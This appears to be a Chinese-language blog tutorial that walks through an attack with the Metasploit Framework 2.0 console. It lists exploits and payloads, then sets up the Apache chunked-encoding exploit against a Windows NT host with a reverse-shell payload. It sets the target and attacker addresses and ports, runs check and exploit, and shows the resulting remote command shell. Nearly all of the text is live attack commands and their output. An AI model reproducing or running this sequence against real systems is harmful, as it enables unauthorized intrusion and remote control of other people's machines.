Metasploit Framework 2.0
* The Console Interface
1) 启动console:
hdm@slasher framework $ ./msfconsole
+ -- --=[ msfconsole v2.0 [15 exploits - 19 payloads]
msf >
2) 显示所有可用 exploits:
msf > show exploits
Metasploit Framework Loaded Exploits
====================================
PoPToP_Negative_Read PoPToP Negative Read Overflow
apache_chunked_win32 Apache Win32 Chunked Encoding
exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow
frontpage_fp30reg_chunked Frontpage fp30reg.dll Chunked Encoding
ia_webmail IA WebMail 3.x Buffer Overflow
iis50_nsiislog_post IIS 5.0 nsiislog.dll POST Overflow
iis50_printer_overflow IIS 5.0 Printer Buffer Overflow
iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow
msrpc_dcom_ms03_026_win2kxp Microsoft RPC DCOM MSO3-026 NT 2K/XP
msrpc_dcom_ms03_026_winnt Microsoft RPC DCOM MSO3-026 NT 4.0
mssql2000_resolution MSSQL 2000 Resolution Overflow
realserver_describe_linux RealServer Describe Buffer Overflow
samba_trans2open Samba trans2open Overflow
solaris_sadmind_exec Solaris sadmind Remote Exec
warftpd_165_pass War-FTPD 1.65 PASS Overflow
显示所有可用的溢出成功后的操做:
msf > show payloads
Metasploit Framework Loaded Payloads
====================================
bsdx86bind Listen for connection and spawn a shell
bsdx86findsock Spawn a shell on the established connection
bsdx86reverse Connect back to attacker and spawn a shell
cmd_generic Run a specific command on the remote system
cmd_sol_bind Use inetd to create a persistent bindshell
cmd_unix_reverse Use telnet|sh|telnet to simulate reverse shell
linx86bind Listen for connection and spawn a shell
linx86bind_ie Listen for connection and spawn a shell
linx86findsock Spawn a shell on the established connection
linx86reverse Connect back to attacker and spawn a shell
linx86reverse_ie Connect back to attacker and spawn a shell
linx86reverse_imp Connect back to attacker and download impurity module
linx86reverse_xor Connect back to attacker and spawn an encrypted shell
solx86bind Listen for connection and spawn a shell
solx86findsock Spawn a shell on the established connection
solx86reverse Connect back to attacker and spawn a shell
winadduser Create admin user X with pass X
winbind Listen for connection and spawn a shell
winreverse Connect back to attacker and spawn a shell
3) 选择需要运行的 exploit:
msf > use apache_chunked_win32
msf apache_chunked_win32 >
4) 显示需要运行的 exploit 所能攻击的系统平台:
msf apache_chunked_win32 > show targets
Supported Exploit Targets
=========================
0 Windows NT/2K Brute Force
1 Windows 2000
2 Windows NT
5) 为 target 选择恰当的值,表明需要攻击的平台类型:
msf apache_chunked_win32 > set TARGET 2
TARGET -> 2
这里选择了2,表明攻击NT平台。
6) 显示这个 exploit 溢出成功后可执行的操作:
msf apache_chunked_win32 > show payloads
Metasploit Framework Usable Payloads
====================================
winadduser Create admin user X with pass X(在目标主机建立指定的管理员组用户名和密码)
winbind Listen for connection and spawn a shell(在目标主机某端口绑定shell)
winreverse Connect back to attacker and spawn a shell(让目标端口反连攻击机某监听端口获取shell)
7) 选择执行后的操作:
msf apache_chunked_win32 > set PAYLOAD winreverse
PAYLOAD -> winreverse
这里选择了(让目标端口反连攻击机某监听端口获取shell)。
8) 显示可用的选项:
msf apache_chunked_win32 > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ------- ------------------
optional SSL Use SSL
required RHOST The target address
required RPORT 80 The target port
Payload: Name Default Description
-------- -------- ------- ------------------------------------------
optional EXITFUNC seh Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT Local port to receive connection
9) 显示可选择的高级选项:
msf apache_chunked_win32 > show advanced
Exploit and Payload Advanced Options
====================================
Payload (Msf::Payload::win32_reverse):
--------------------------------------
Exploit (Msf::Exploit::apache_chunked_win32):
---------------------------------------------
(this exploit and payload set have no advanced options)
10) 设置所有必须选项:
msf apache_chunked_win32 > set RHOST 192.168.1.241 (设置了目标主机ip)
RHOST -> 192.168.1.241
msf apache_chunked_win32 > set RPORT 8080 (设置了目标主机被攻击端口)
RPORT -> 8080
msf apache_chunked_win32 > set LHOST 192.168.1.244 (设置本地主机ip)
LHOST -> 192.168.1.244
msf apache_chunked_win32 > set LPORT 4444 (设置本地主机建立连接的端口)
LPORT -> 4444
12) 执行exploit:
msf apache_chunked_win32 > check
Vulnerable server 'Apache/1.3.22 (Win32)'
13) Launch the actual exploit :)
msf apache_chunked_win32 > exploit
Trying to exploit Windows NT using return 0x1c0f1022 with padding of 348...
Trying to exploit Windows NT using return 0x1c0f1022 with padding of 352...
Connection from 192.168.1.241:1036...
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
c:\program files\apache group\apache>
最后成功获取目标主机192.168.1.241 的shell。
没有评论:
发表评论